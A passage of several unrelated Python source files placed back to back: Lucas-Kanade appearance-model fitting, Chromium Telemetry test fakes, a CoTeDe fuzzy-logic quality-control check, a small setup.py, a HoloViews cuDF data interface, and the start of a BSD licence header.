        n_params = self.transform.n_parameters

        # Initial appearance weights
        if project:
            # Obtained weights by projection
            IWxp = image.warp_to(self.template.mask, self.transform,
                                 interpolator=self.interpolator)
            weights = self.appearance_model.project(IWxp)
            # Reset template
            self.template = self.appearance_model.instance(weights)
        else:
            # Set all weights to 0 (yielding the mean)
            weights = np.zeros(self.appearance_model.n_active_components)

        lk_fitting.weights.append(weights)

        # Compute appearance model Jacobian wrt weights
        appearance_jacobian = self.appearance_model._jacobian.T

        # Forward Additive Algorithm
        while n_iters < max_iters and error > self.eps:
            # Compute warped image with current weights
            IWxp = image.warp_to(self.template.mask, self.transform,
                                 interpolator=self.interpolator)

            # Compute warp Jacobian
            dW_dp = self.transform.jacobian(
                self.template.mask.true_indices)

            # Compute steepest descent images, VI_dW_dp
            J = self.residual.steepest_descent_images(
                image, dW_dp, forward=(self.template, self.transform,
                                       self.interpolator))

            # Concatenate VI_dW_dp with appearance model Jacobian
            self._J = np.hstack((J, appearance_jacobian))

            # Compute Hessian and inverse
            self._H = self.residual.calculate_hessian(self._J)

            # Compute steepest descent parameter updates
            sd_delta_p = self.residual.steepest_descent_update(
                self._J, self.template, IWxp)

            # Compute gradient descent parameter updates
            delta_p = np.real(self._calculate_delta_p(sd_delta_p))

            # Update warp weights
            parameters = self.transform.as_vector() + delta_p[:n_params]
            self.transform.from_vector_inplace(parameters)
            lk_fitting.parameters.append(parameters)

            # Update appearance weights
            weights -= delta_p[n_params:]
            self.template = self.appearance_model.instance(weights)
            lk_fitting.weights.append(weights)

            # Test convergence
            error = np.abs(norm(delta_p))
            n_iters += 1

        lk_fitting.fitted = True
        return lk_fitting


class SimultaneousForwardCompositional(AppearanceLucasKanade):

    @property
    def algorithm(self):
        return 'Simultaneous-FC'

    def _set_up(self):
        # Compute warp Jacobian
        self._dW_dp = self.transform.jacobian(
            self.template.mask.true_indices)

    def _fit(self, lk_fitting, max_iters=20, project=True):
        # Initial error > eps
        error = self.eps + 1
        image = lk_fitting.image
        lk_fitting.weights = []
        n_iters = 0

        # Number of shape weights
        n_params = self.transform.n_parameters

        # Initial appearance weights
        if project:
            # Obtained weights by projection
            IWxp = image.warp_to(self.template.mask, self.transform,
                                 interpolator=self.interpolator)
            weights = self.appearance_model.project(IWxp)
            # Reset template
            self.template = self.appearance_model.instance(weights)
        else:
            # Set all weights to 0 (yielding the mean)
            weights = np.zeros(self.appearance_model.n_active_components)

        lk_fitting.weights.append(weights)

        # Compute appearance model Jacobian wrt weights
        appearance_jacobian = self.appearance_model._jacobian.T

        # Forward Additive Algorithm
        while n_iters < max_iters and error > self.eps:
            # Compute warped image with current weights
            IWxp = image.warp_to(self.template.mask, self.transform,
                                 interpolator=self.interpolator)

            # Compute steepest descent images, VI_dW_dp
            J = self.residual.steepest_descent_images(IWxp, self._dW_dp)

            # Concatenate VI_dW_dp with appearance model Jacobian
            self._J = np.hstack((J, appearance_jacobian))

            # Compute Hessian and inverse
            self._H = self.residual.calculate_hessian(self._J)

            # Compute steepest descent parameter updates
            sd_delta_p = self.residual.steepest_descent_update(
                self._J, self.template, IWxp)

            # Compute gradient descent parameter updates
            delta_p = np.real(self._calculate_delta_p(sd_delta_p))

            # Update warp weights
            self.transform.compose_after_from_vector_inplace(delta_p[:n_params])
            lk_fitting.parameters.append(self.transform.as_vector())

            # Update appearance weights
            weights -= delta_p[n_params:]
            self.template = self.appearance_model.instance(weights)
            lk_fitting.weights.append(weights)

            # Test convergence
            error = np.abs(norm(delta_p))
            n_iters += 1

        lk_fitting.fitted = True
        return lk_fitting


class SimultaneousInverseCompositional(AppearanceLucasKanade):

    @property
    def algorithm(self):
        return 'Simultaneous-IA'

    def _set_up(self):
        # Compute the Jacobian of the warp
        self._dW_dp = self.transform.jacobian(
            self.appearance_model.mean.mask.true_indices)

    def _fit(self, lk_fitting, max_iters=20, project=True):
        # Initial error > eps
        error = self.eps + 1
        image = lk_fitting.image
        lk_fitting.weights = []
        n_iters = 0

        # Number of shape weights
        n_params = self.transform.n_parameters

        # Initial appearance weights
        if project:
            # Obtained weights by projection
            IWxp = image.warp_to(self.template.mask, self.transform,
                                 interpolator=self.interpolator)
            weights = self.appearance_model.project(IWxp)
            # Reset template
            self.template = self.appearance_model.instance(weights)
        else:
            # Set all weights to 0 (yielding the mean)
            weights = np.zeros(self.appearance_model.n_active_components)

        lk_fitting.weights.append(weights)

        # Compute appearance model Jacobian wrt weights
        appearance_jacobian = -self.appearance_model._jacobian.T

        # Baker-Matthews, Inverse Compositional Algorithm
        while n_iters < max_iters and error > self.eps:
            # Compute warped image with current weights
            IWxp = image.warp_to(self.template.mask, self.transform,
                                 interpolator=self.interpolator)

            # Compute steepest descent images, VT_dW_dp
            J = self.residual.steepest_descent_images(self.template,
                                                      self._dW_dp)

            # Concatenate VI_dW_dp with appearance model Jacobian
            self._J = np.hstack((J, appearance_jacobian))

            # Compute Hessian and inverse
            self._H = self.residual.calculate_hessian(self._J)

            # Compute steepest descent parameter updates
            sd_delta_p = self.residual.steepest_descent_update(
                self._J, IWxp, self.template)

            # Compute gradient descent parameter updates
            delta_p = -np.real(self._calculate_delta_p(sd_delta_p))

            # Update warp weights
            self.transform.compose_after_from_vector_inplace(delta_p[:n_params])
            lk_fitting.parameters.append(self.transform.as_vector())

            # Update appearance weights
            weights -= delta_p[n_params:]
            self.template = self.appearance_model.instance(weights)
            lk_fitting.weights.append(weights)

            # Test convergence
            error = np.abs(norm(delta_p))
            n_iters += 1

        lk_fitting.fitted = True
        return lk_fitting

# Copyright 2015 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.

"""Provides fakes for several of Telemetry's internal objects.

These allow code like story_runner and Benchmark to be run and tested
without compiling or starting a browser. Class names prepended with an
underscore are intended to be implementation details, and should not
be subclassed; however, some, like _FakeBrowser, have public APIs that
may need to be called in tests.
"""
from telemetry.internal.backends.chrome_inspector import websocket
from telemetry.internal.browser import browser_options
from telemetry.internal.platform import system_info
from telemetry.page import shared_page_state
from telemetry.util import image_util
from telemetry.testing.internal import fake_gpu_info
from types import ModuleType


# Classes and functions which are intended to be part of the public
# fakes API.

class FakePlatform(object):
  def __init__(self):
    self._network_controller = None
    self._tracing_controller = None
    self._has_battor = False
    self._os_name = 'FakeOS'
    self._device_type_name = 'abc'
    self._is_svelte = False
    self._is_aosp = True

  @property
  def is_host_platform(self):
    raise NotImplementedError

  @property
  def network_controller(self):
    if self._network_controller is None:
      self._network_controller = _FakeNetworkController()
    return  self._network_controller

  @property
  def tracing_controller(self):
    if self._tracing_controller is None:
      self._tracing_controller = _FakeTracingController()
    return  self._tracing_controller

  def Initialize(self):
    pass

  def CanMonitorThermalThrottling(self):
    return False

  def IsThermallyThrottled(self):
    return False

  def HasBeenThermallyThrottled(self):
    return False

  def GetArchName(self):
    raise NotImplementedError

  def SetOSName(self, name):
    self._os_name = name

  def GetOSName(self):
    return self._os_name

  def GetOSVersionName(self):
    raise NotImplementedError

  def GetOSVersionDetailString(self):
    raise NotImplementedError

  def StopAllLocalServers(self):
    pass

  def WaitForBatteryTemperature(self, _):
    pass

  def HasBattOrConnected(self):
    return self._has_battor

  def SetBattOrDetected(self, b):
    assert isinstance(b, bool)
    self._has_battor = b

  # TODO(rnephew): Investigate moving from setters to @property.
  def SetDeviceTypeName(self, name):
    self._device_type_name = name

  def GetDeviceTypeName(self):
    return self._device_type_name

  def SetIsSvelte(self, b):
    assert isinstance(b, bool)
    self._is_svelte = b

  def IsSvelte(self):
    if self._os_name != 'android':
      raise NotImplementedError
    return self._is_svelte

  def SetIsAosp(self, b):
    assert isinstance(b, bool)
    self._is_aosp = b

  def IsAosp(self):
    return self._is_aosp and self._os_name == 'android'


class FakeLinuxPlatform(FakePlatform):
  def __init__(self):
    super(FakeLinuxPlatform, self).__init__()
    self.screenshot_png_data = None
    self.http_server_directories = []
    self.http_server = FakeHTTPServer()

  @property
  def is_host_platform(self):
    return True

  def GetDeviceTypeName(self):
    return 'Desktop'

  def GetArchName(self):
    return 'x86_64'

  def GetOSName(self):
    return 'linux'

  def GetOSVersionName(self):
    return 'trusty'

  def GetOSVersionDetailString(self):
    return ''

  def CanTakeScreenshot(self):
    return bool(self.screenshot_png_data)

  def TakeScreenshot(self, file_path):
    if not self.CanTakeScreenshot():
      raise NotImplementedError
    img = image_util.FromBase64Png(self.screenshot_png_data)
    image_util.WritePngFile(img, file_path)
    return True

  def SetHTTPServerDirectories(self, paths):
    self.http_server_directories.append(paths)


class FakeHTTPServer(object):
  def UrlOf(self, url):
    del url  # unused
    return 'file:///foo'


class FakePossibleBrowser(object):
  def __init__(self, execute_on_startup=None,
               execute_after_browser_creation=None):
    self._returned_browser = _FakeBrowser(FakeLinuxPlatform())
    self.browser_type = 'linux'
    self.supports_tab_control = False
    self.is_remote = False
    self.execute_on_startup = execute_on_startup
    self.execute_after_browser_creation = execute_after_browser_creation

  @property
  def returned_browser(self):
    """The browser object that will be returned through later API calls."""
    return self._returned_browser

  def Create(self, finder_options):
    if self.execute_on_startup is not None:
      self.execute_on_startup()
    del finder_options  # unused
    if self.execute_after_browser_creation is not None:
      self.execute_after_browser_creation(self._returned_browser)
    return self.returned_browser

  @property
  def platform(self):
    """The platform object from the returned browser.

    To change this or set it up, change the returned browser's
    platform.
    """
    return self.returned_browser.platform

  def IsRemote(self):
    return self.is_remote

  def SetCredentialsPath(self, _):
    pass


class FakeSharedPageState(shared_page_state.SharedPageState):
  def __init__(self, test, finder_options, story_set):
    super(FakeSharedPageState, self).__init__(test, finder_options, story_set)

  def _GetPossibleBrowser(self, test, finder_options):
    p = FakePossibleBrowser()
    self.ConfigurePossibleBrowser(p)
    return p

  def ConfigurePossibleBrowser(self, possible_browser):
    """Override this to configure the PossibleBrowser.

    Can make changes to the browser's configuration here via e.g.:
       possible_browser.returned_browser.returned_system_info = ...
    """
    pass


  def DidRunStory(self, results):
    # TODO(kbr): add a test which throws an exception from DidRunStory
    # to verify the fix from https://crrev.com/86984d5fc56ce00e7b37ebe .
    super(FakeSharedPageState, self).DidRunStory(results)


class FakeSystemInfo(system_info.SystemInfo):
  def __init__(self, model_name='', gpu_dict=None, command_line=''):
    if gpu_dict == None:
      gpu_dict = fake_gpu_info.FAKE_GPU_INFO
    super(FakeSystemInfo, self).__init__(model_name, gpu_dict, command_line)


class _FakeBrowserFinderOptions(browser_options.BrowserFinderOptions):
  def __init__(self, execute_on_startup=None,
               execute_after_browser_creation=None, *args, **kwargs):
    browser_options.BrowserFinderOptions.__init__(self, *args, **kwargs)
    self.fake_possible_browser = \
      FakePossibleBrowser(
        execute_on_startup=execute_on_startup,
        execute_after_browser_creation=execute_after_browser_creation)

def CreateBrowserFinderOptions(browser_type=None, execute_on_startup=None,
                               execute_after_browser_creation=None):
  """Creates fake browser finder options for discovering a browser."""
  return _FakeBrowserFinderOptions(
    browser_type=browser_type,
    execute_on_startup=execute_on_startup,
    execute_after_browser_creation=execute_after_browser_creation)


# Internal classes. Note that end users may still need to both call
# and mock out methods of these classes, but they should not be
# subclassed.

class _FakeBrowser(object):
  def __init__(self, platform):
    self._tabs = _FakeTabList(self)
    # Fake the creation of the first tab.
    self._tabs.New()
    self._returned_system_info = FakeSystemInfo()
    self._platform = platform
    self._browser_type = 'release'
    self._is_crashed = False

  @property
  def platform(self):
    return self._platform

  @platform.setter
  def platform(self, incoming):
    """Allows overriding of the fake browser's platform object."""
    assert isinstance(incoming, FakePlatform)
    self._platform = incoming

  @property
  def returned_system_info(self):
    """The object which will be returned from calls to GetSystemInfo."""
    return self._returned_system_info

  @returned_system_info.setter
  def returned_system_info(self, incoming):
    """Allows overriding of the returned SystemInfo object.

    Incoming argument must be an instance of FakeSystemInfo."""
    assert isinstance(incoming, FakeSystemInfo)
    self._returned_system_info = incoming

  @property
  def browser_type(self):
    """The browser_type this browser claims to be ('debug', 'release', etc.)"""
    return self._browser_type

  @browser_type.setter
  def browser_type(self, incoming):
    """Allows setting of the browser_type."""
    self._browser_type = incoming

  @property
  def credentials(self):
    return _FakeCredentials()

  def Close(self):
    self._is_crashed = False

  @property
  def supports_system_info(self):
    return True

  def GetSystemInfo(self):
    return self.returned_system_info

  @property
  def supports_tab_control(self):
    return True

  @property
  def tabs(self):
    return self._tabs

  def DumpStateUponFailure(self):
    pass


class _FakeCredentials(object):
  def WarnIfMissingCredentials(self, _):
    pass


class _FakeTracingController(object):
  def __init__(self):
    self._is_tracing = False

  def StartTracing(self, tracing_config, timeout=10):
    self._is_tracing = True
    del tracing_config
    del timeout

  def StopTracing(self):
    self._is_tracing = False

  @property
  def is_tracing_running(self):
    return self._is_tracing

  def ClearStateIfNeeded(self):
    pass

  def IsChromeTracingSupported(self):
    return True


class _FakeNetworkController(object):
  def __init__(self):
    self.wpr_mode = None
    self.extra_wpr_args = None
    self.is_initialized = False
    self.is_open = False
    self.use_live_traffic = None

  def InitializeIfNeeded(self, use_live_traffic=False):
    self.use_live_traffic = use_live_traffic

  def UpdateTrafficSettings(self, round_trip_latency_ms=None,
      download_bandwidth_kbps=None, upload_bandwidth_kbps=None):
    pass

  def Open(self, wpr_mode, extra_wpr_args, use_wpr_go=False):
    del use_wpr_go  # Unused.
    self.wpr_mode = wpr_mode
    self.extra_wpr_args = extra_wpr_args
    self.is_open = True

  def Close(self):
    self.wpr_mode = None
    self.extra_wpr_args = None
    self.is_initialized = False
    self.is_open = False

  def StartReplay(self, archive_path, make_javascript_deterministic=False):
    del make_javascript_deterministic  # Unused.
    assert self.is_open
    self.is_initialized = archive_path is not None

  def StopReplay(self):
    self.is_initialized = False


class _FakeTab(object):
  def __init__(self, browser, tab_id):
    self._browser = browser
    self._tab_id = str(tab_id)
    self._collect_garbage_count = 0
    self.test_png = None

  @property
  def collect_garbage_count(self):
    return self._collect_garbage_count

  @property
  def id(self):
    return self._tab_id

  @property
  def browser(self):
    return self._browser

  def WaitForDocumentReadyStateToBeComplete(self, timeout=0):
    pass

  def Navigate(self, url, script_to_evaluate_on_commit=None,
               timeout=0):
    del script_to_evaluate_on_commit, timeout # unused
    if url == 'chrome://crash':
      self.browser._is_crashed = True
      raise Exception

  def WaitForDocumentReadyStateToBeInteractiveOrBetter(self, timeout=0):
    pass

  def WaitForFrameToBeDisplayed(self, timeout=0):
    pass

  def IsAlive(self):
    return True

  def CloseConnections(self):
    pass

  def CollectGarbage(self):
    self._collect_garbage_count += 1

  def Close(self):
    pass

  @property
  def screenshot_supported(self):
    return self.test_png is not None

  def Screenshot(self):
    assert self.screenshot_supported, 'Screenshot is not supported'
    return image_util.FromBase64Png(self.test_png)


class _FakeTabList(object):
  _current_tab_id = 0

  def __init__(self, browser):
    self._tabs = []
    self._browser = browser

  def New(self, timeout=300):
    del timeout  # unused
    type(self)._current_tab_id += 1
    t = _FakeTab(self._browser, type(self)._current_tab_id)
    self._tabs.append(t)
    return t

  def __iter__(self):
    return self._tabs.__iter__()

  def __len__(self):
    return len(self._tabs)

  def __getitem__(self, index):
    if self._tabs[index].browser._is_crashed:
      raise Exception
    else:
      return self._tabs[index]

  def GetTabById(self, identifier):
    """The identifier of a tab can be accessed with tab.id."""
    for tab in self._tabs:
      if tab.id == identifier:
        return tab
    return None


class FakeInspectorWebsocket(object):
  _NOTIFICATION_EVENT = 1
  _NOTIFICATION_CALLBACK = 2

  """A fake InspectorWebsocket.

  A fake that allows tests to send pregenerated data. Normal
  InspectorWebsockets allow for any number of domain handlers. This fake only
  allows up to 1 domain handler, and assumes that the domain of the response
  always matches that of the handler.
  """
  def __init__(self, mock_timer):
    self._mock_timer = mock_timer
    self._notifications = []
    self._response_handlers = {}
    self._pending_callbacks = {}
    self._handler = None

  def RegisterDomain(self, _, handler):
    self._handler = handler

  def AddEvent(self, method, params, time):
    if self._notifications:
      assert self._notifications[-1][1] < time, (
          'Current response is scheduled earlier than previous response.')
    response = {'method': method, 'params': params}
    self._notifications.append((response, time, self._NOTIFICATION_EVENT))

  def AddAsyncResponse(self, method, result, time):
    if self._notifications:
      assert self._notifications[-1][1] < time, (
          'Current response is scheduled earlier than previous response.')
    response = {'method': method, 'result': result}
    self._notifications.append((response, time, self._NOTIFICATION_CALLBACK))

  def AddResponseHandler(self, method, handler):
    self._response_handlers[method] = handler

  def SyncRequest(self, request, *args, **kwargs):
    del args, kwargs  # unused
    handler = self._response_handlers[request['method']]
    return handler(request) if handler else None

  def AsyncRequest(self, request, callback):
    self._pending_callbacks.setdefault(request['method'], []).append(callback)

  def SendAndIgnoreResponse(self, request):
    pass

  def Connect(self, _):
    pass

  def DispatchNotifications(self, timeout):
    current_time = self._mock_timer.time()
    if not self._notifications:
      self._mock_timer.SetTime(current_time + timeout + 1)
      raise websocket.WebSocketTimeoutException()

    response, time, kind = self._notifications[0]
    if time - current_time > timeout:
      self._mock_timer.SetTime(current_time + timeout + 1)
      raise websocket.WebSocketTimeoutException()

    self._notifications.pop(0)
    self._mock_timer.SetTime(time + 1)
    if kind == self._NOTIFICATION_EVENT:
      self._handler(response)
    elif kind == self._NOTIFICATION_CALLBACK:
      callback = self._pending_callbacks.get(response['method']).pop(0)
      callback(response)
    else:
      raise Exception('Unexpected response type')


class FakeTimer(object):
  """ A fake timer to fake out the timing for a module.
    Args:
      module: module to fake out the time
  """
  def __init__(self, module=None):
    self._elapsed_time = 0
    self._module = module
    self._actual_time = None
    if module:
      assert isinstance(module, ModuleType)
      self._actual_time = module.time
      self._module.time = self

  def sleep(self, time):
    self._elapsed_time += time

  def time(self):
    return self._elapsed_time

  def SetTime(self, time):
    self._elapsed_time = time

  def __del__(self):
    self.Restore()

  def Restore(self):
    if self._module:
      self._module.time = self._actual_time
      self._module = None
      self._actual_time = None


# -*- coding: utf-8 -*-
# Licensed under a 3-clause BSD style license - see LICENSE.rst

"""
    Quality Control based on fuzzy logic.
"""

import logging

import numpy as np

from .core import QCCheckVar
from .gradient import gradient
from .spike import spike
from .woa_normbias import woa_normbias
from cotede.fuzzy import fuzzy_uncertainty

module_logger = logging.getLogger(__name__)


def fuzzylogic(features, cfg, require="all"):
    """

        FIXME: Think about, should I return 0, or have an assert, and at qc.py
          all qc tests are applied with a try, and in case it fails it flag
          0s.

    """
    require = cfg.get("require", require)

    if (require == "all") and not np.all([f in features for f in cfg["features"]]):
        module_logger.warning(
            "Not all features (%s) required by fuzzy logic are available".format(
                cfg["features"].keys()
            )
        )
        raise KeyError

    uncertainty = fuzzy_uncertainty(
        data=features, features=cfg["features"], output=cfg["output"], require=require
    )

    return uncertainty


class FuzzyLogic(QCCheckVar):
    def set_features(self):
        self.features = {}
        for v in [f for f in self.cfg["features"] if f not in self.features]:
            if v == "woa_bias":
                woa_comparison = woa_normbias(self.data, self.varname, self.attrs)
                self.features[v] = woa_comparison["woa_bias"]
            elif v == "woa_normbias":
                woa_comparison = woa_normbias(self.data, self.varname, self.attrs)
                self.features[v] = woa_comparison["woa_normbias"]
            elif v == "spike":
                self.features[v] = spike(self.data[self.varname])
            elif v == "gradient":
                self.features[v] = gradient(self.data[self.varname])

        self.features["fuzzylogic"] = fuzzylogic(self.features, self.cfg)


    def test(self):
        self.flags = {}
        cfg = self.cfg
        flag = np.zeros(np.shape(self.data[self.varname]), dtype="i1")

        uncertainty = self.features["fuzzylogic"]
        # FIXME: As it is now, it will have no zero flag value. Think about cases
        #   where some values in a profile would not be estimated, hence flag=0
        # I needed to use np.nonzeros because now uncertainty is a masked array,
        #   to accept when a feature is masked.
        flag[np.nonzero(uncertainty <= 0.29)] = 1
        flag[np.nonzero((uncertainty > 0.29) & (uncertainty <= 0.34))] = 2
        flag[np.nonzero((uncertainty > 0.34) & (uncertainty <= 0.72))] = 3
        flag[np.nonzero(uncertainty > 0.72)] = 4

        self.flags["fuzzylogic"] = flag

from setuptools import setup, find_packages


setup(name='gelato.models',
      version='0.1.2',
      description='Gelato models',
      namespace_packages=['gelato'],
      long_description='',
      author='',
      author_email='',
      license='',
      url='',
      include_package_data=True,
      packages=find_packages(exclude=['tests']),
      install_requires=['django', 'tower'])

import sys
import warnings

try:
    import itertools.izip as zip
except ImportError:
    pass

from itertools import product

import numpy as np

from .. import util
from ..dimension import dimension_name
from ..element import Element
from ..ndmapping import NdMapping, item_check, sorted_context
from .interface import DataError, Interface
from .pandas import PandasInterface
from .util import finite_range


class cuDFInterface(PandasInterface):
    """
    The cuDFInterface allows a Dataset objects to wrap a cuDF
    DataFrame object. Using cuDF allows working with columnar
    data on a GPU. Most operations leave the data in GPU memory,
    however to plot the data it has to be loaded into memory.

    The cuDFInterface covers almost the complete API exposed
    by the PandasInterface with two notable exceptions:

    1) Aggregation and groupby do not have a consistent sort order
       (see https://github.com/rapidsai/cudf/issues/4237)
    3) Not all functions can be easily applied to a cuDF so
       some functions applied with aggregate and reduce will not work.
    """

    datatype = 'cuDF'

    types = ()

    @classmethod
    def loaded(cls):
        return 'cudf' in sys.modules

    @classmethod
    def applies(cls, obj):
        if not cls.loaded():
            return False
        import cudf
        return isinstance(obj, (cudf.DataFrame, cudf.Series))

    @classmethod
    def init(cls, eltype, data, kdims, vdims):
        import cudf
        import pandas as pd

        element_params = eltype.param.objects()
        kdim_param = element_params['kdims']
        vdim_param = element_params['vdims']

        if isinstance(data, (cudf.Series, pd.Series)):
            data = data.to_frame()

        if not isinstance(data, cudf.DataFrame):
            data, _, _ = PandasInterface.init(eltype, data, kdims, vdims)
            data = cudf.from_pandas(data)

        columns = list(data.columns)
        ncols = len(columns)
        index_names = [data.index.name]
        if index_names == [None]:
            index_names = ['index']
        if eltype._auto_indexable_1d and ncols == 1 and kdims is None:
            kdims = list(index_names)

        if isinstance(kdim_param.bounds[1], int):
            ndim = min([kdim_param.bounds[1], len(kdim_param.default)])
        else:
            ndim = None
        nvdim = vdim_param.bounds[1] if isinstance(vdim_param.bounds[1], int) else None
        if kdims and vdims is None:
            vdims = [c for c in columns if c not in kdims]
        elif vdims and kdims is None:
            kdims = [c for c in columns if c not in vdims][:ndim]
        elif kdims is None:
            kdims = list(columns[:ndim])
            if vdims is None:
                vdims = [d for d in columns[ndim:((ndim+nvdim) if nvdim else None)]
                         if d not in kdims]
        elif kdims == [] and vdims is None:
            vdims = list(columns[:nvdim if nvdim else None])

        # Handle reset of index if kdims reference index by name
        for kd in kdims:
            kd = dimension_name(kd)
            if kd in columns:
                continue
            if any(kd == ('index' if name is None else name)
                   for name in index_names):
                data = data.reset_index()
                break
        if any(isinstance(d, (np.int64, int)) for d in kdims+vdims):
            raise DataError("cudf DataFrame column names used as dimensions "
                            "must be strings not integers.", cls)

        if kdims:
            kdim = dimension_name(kdims[0])
            if eltype._auto_indexable_1d and ncols == 1 and kdim not in columns:
                data = data.copy()
                data.insert(0, kdim, np.arange(len(data)))

        for d in kdims+vdims:
            d = dimension_name(d)
            if len([c for c in columns if c == d]) > 1:
                raise DataError('Dimensions may not reference duplicated DataFrame '
                                'columns (found duplicate %r columns). If you want to plot '
                                'a column against itself simply declare two dimensions '
                                'with the same name. '% d, cls)
        return data, {'kdims':kdims, 'vdims':vdims}, {}


    @classmethod
    def range(cls, dataset, dimension):
        dimension = dataset.get_dimension(dimension, strict=True)
        column = dataset.data[dimension.name]
        if dimension.nodata is not None:
            column = cls.replace_value(column, dimension.nodata)
        if column.dtype.kind == 'O':
            return np.NaN, np.NaN
        else:
            return finite_range(column, column.min(), column.max())


    @classmethod
    def values(cls, dataset, dim, expanded=True, flat=True, compute=True,
               keep_index=False):
        dim = dataset.get_dimension(dim, strict=True)
        data = dataset.data[dim.name]
        if not expanded:
            data = data.unique()
            return data.values_host if compute else data.values
        elif keep_index:
            return data
        elif compute:
            return data.values_host
        try:
            return data.values
        except Exception:
            return data.values_host

    @classmethod
    def groupby(cls, dataset, dimensions, container_type, group_type, **kwargs):
        # Get dimensions information
        dimensions = [dataset.get_dimension(d).name for d in dimensions]
        kdims = [kdim for kdim in dataset.kdims if kdim not in dimensions]

        # Update the kwargs appropriately for Element group types
        group_kwargs = {}
        group_type = dict if group_type == 'raw' else group_type
        if issubclass(group_type, Element):
            group_kwargs.update(util.get_param_values(dataset))
            group_kwargs['kdims'] = kdims
        group_kwargs.update(kwargs)

        # Propagate dataset
        group_kwargs['dataset'] = dataset.dataset

        # Find all the keys along supplied dimensions
        keys = product(*(dataset.data[dimensions[0]].unique().values_host for d in dimensions))

        # Iterate over the unique entries applying selection masks
        grouped_data = []
        for unique_key in util.unique_iterator(keys):
            group_data = dataset.select(**dict(zip(dimensions, unique_key)))
            if not len(group_data):
                continue
            group_data = group_type(group_data, **group_kwargs)
            grouped_data.append((unique_key, group_data))

        if issubclass(container_type, NdMapping):
            with item_check(False), sorted_context(False):
                kdims = [dataset.get_dimension(d) for d in dimensions]
                return container_type(grouped_data, kdims=kdims)
        else:
            return container_type(grouped_data)


    @classmethod
    def select_mask(cls, dataset, selection):
        """
        Given a Dataset object and a dictionary with dimension keys and
        selection keys (i.e. tuple ranges, slices, sets, lists, or literals)
        return a boolean mask over the rows in the Dataset object that
        have been selected.
        """
        mask = None
        for dim, sel in selection.items():
            if isinstance(sel, tuple):
                sel = slice(*sel)
            arr = cls.values(dataset, dim, keep_index=True)
            if util.isdatetime(arr) and util.pd:
                try:
                    sel = util.parse_datetime_selection(sel)
                except:
                    pass

            new_masks = []
            if isinstance(sel, slice):
                with warnings.catch_warnings():
                    warnings.filterwarnings('ignore', r'invalid value encountered')
                    if sel.start is not None:
                        new_masks.append(sel.start <= arr)
                    if sel.stop is not None:
                        new_masks.append(arr < sel.stop)
                if not new_masks:
                    continue
                new_mask = new_masks[0]
                for imask in new_masks[1:]:
                    new_mask &= imask
            elif isinstance(sel, (set, list)):
                for v in sel:
                    new_masks.append(arr==v)
                if not new_masks:
                    continue
                new_mask = new_masks[0]
                for imask in new_masks[1:]:
                    new_mask |= imask
            elif callable(sel):
                new_mask = sel(arr)
            else:
                new_mask = arr == sel

            if mask is None:
                mask = new_mask
            else:
                mask &= new_mask
        return mask

    @classmethod
    def select(cls, dataset, selection_mask=None, **selection):
        df = dataset.data
        if selection_mask is None:
            selection_mask = cls.select_mask(dataset, selection)

        indexed = cls.indexed(dataset, selection)
        if selection_mask is not None:
            df = df.loc[selection_mask]
        if indexed and len(df) == 1 and len(dataset.vdims) == 1:
            return df[dataset.vdims[0].name].iloc[0]
        return df

    @classmethod
    def concat_fn(cls, dataframes, **kwargs):
        import cudf
        return cudf.concat(dataframes, **kwargs)

    @classmethod
    def add_dimension(cls, dataset, dimension, dim_pos, values, vdim):
        data = dataset.data.copy()
        if dimension.name not in data:
            data[dimension.name] = values
        return data

    @classmethod
    def aggregate(cls, dataset, dimensions, function, **kwargs):
        data = dataset.data
        cols = [d.name for d in dataset.kdims if d in dimensions]
        vdims = dataset.dimensions('value', label='name')
        reindexed = data[cols+vdims]
        agg = function.__name__
        if len(dimensions):
            agg_map = {'amin': 'min', 'amax': 'max'}
            agg = agg_map.get(agg, agg)
            grouped = reindexed.groupby(cols, sort=False)
            if not hasattr(grouped, agg):
                raise ValueError('%s aggregation is not supported on cudf DataFrame.' % agg)
            df = getattr(grouped, agg)().reset_index()
        else:
            agg_map = {'amin': 'min', 'amax': 'max', 'size': 'count'}
            agg = agg_map.get(agg, agg)
            if not hasattr(reindexed, agg):
                raise ValueError('%s aggregation is not supported on cudf DataFrame.' % agg)
            agg = getattr(reindexed, agg)()
            data = dict(((col, [v]) for col, v in zip(agg.index.values_host, agg.to_array())))
            df = util.pd.DataFrame(data, columns=list(agg.index.values_host))

        dropped = []
        for vd in vdims:
            if vd not in df.columns:
                dropped.append(vd)
        return df, dropped


    @classmethod
    def iloc(cls, dataset, index):
        import cudf

        rows, cols = index
        scalar = False
        columns = list(dataset.data.columns)
        if isinstance(cols, slice):
            cols = [d.name for d in dataset.dimensions()][cols]
        elif np.isscalar(cols):
            scalar = np.isscalar(rows)
            cols = [dataset.get_dimension(cols).name]
        else:
            cols = [dataset.get_dimension(d).name for d in index[1]]
        col_index = [columns.index(c) for c in cols]
        if np.isscalar(rows):
            rows = [rows]

        if scalar:
            return dataset.data[cols[0]].iloc[rows[0]]
        result = dataset.data.iloc[rows, col_index]

        # cuDF does not handle single rows and cols indexing correctly
        # as of cudf=0.10.0 so we have to convert Series back to DataFrame
        if isinstance(result, cudf.Series):
            if len(cols) == 1:
                result = result.to_frame(cols[0])
            else:
                result = result.to_frame().T
        return result


    @classmethod
    def sort(cls, dataset, by=[], reverse=False):
        cols = [dataset.get_dimension(d, strict=True).name for d in by]
        return dataset.data.sort_values(by=cols, ascending=not reverse)


    @classmethod
    def dframe(cls, dataset, dimensions):
        if dimensions:
            return dataset.data[dimensions].to_pandas()
        else:
            return dataset.data.to_pandas()


Interface.register(cuDFInterface)

# Copyright (c) 2006-2009 The Trustees of Indiana University.                   
# All rights reserved.                                                          
#                                                                               
# Redistribution and use in source and binary forms, with or without            
# modification, are permitted provided that the following conditions are met:   
#                                                                               
# - Redistributions of source code must retain the above copyright notice, this 
#   list of conditions and the following disclaimer.                            
#                                                                               
# - Redistributions in binary form must reproduce the above copyright notice,   
#   this list of conditions and the following disclaimer in the documentation   
#   and/or other materials provided with the distribution.                      
#                                                                               
# - Neither the Indiana University nor the names of its contributors may be used
#   to endorse or promote products derived from this software without specific  
#   prior written permission.                                                   
#                                                                               
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"   
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE     
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE   
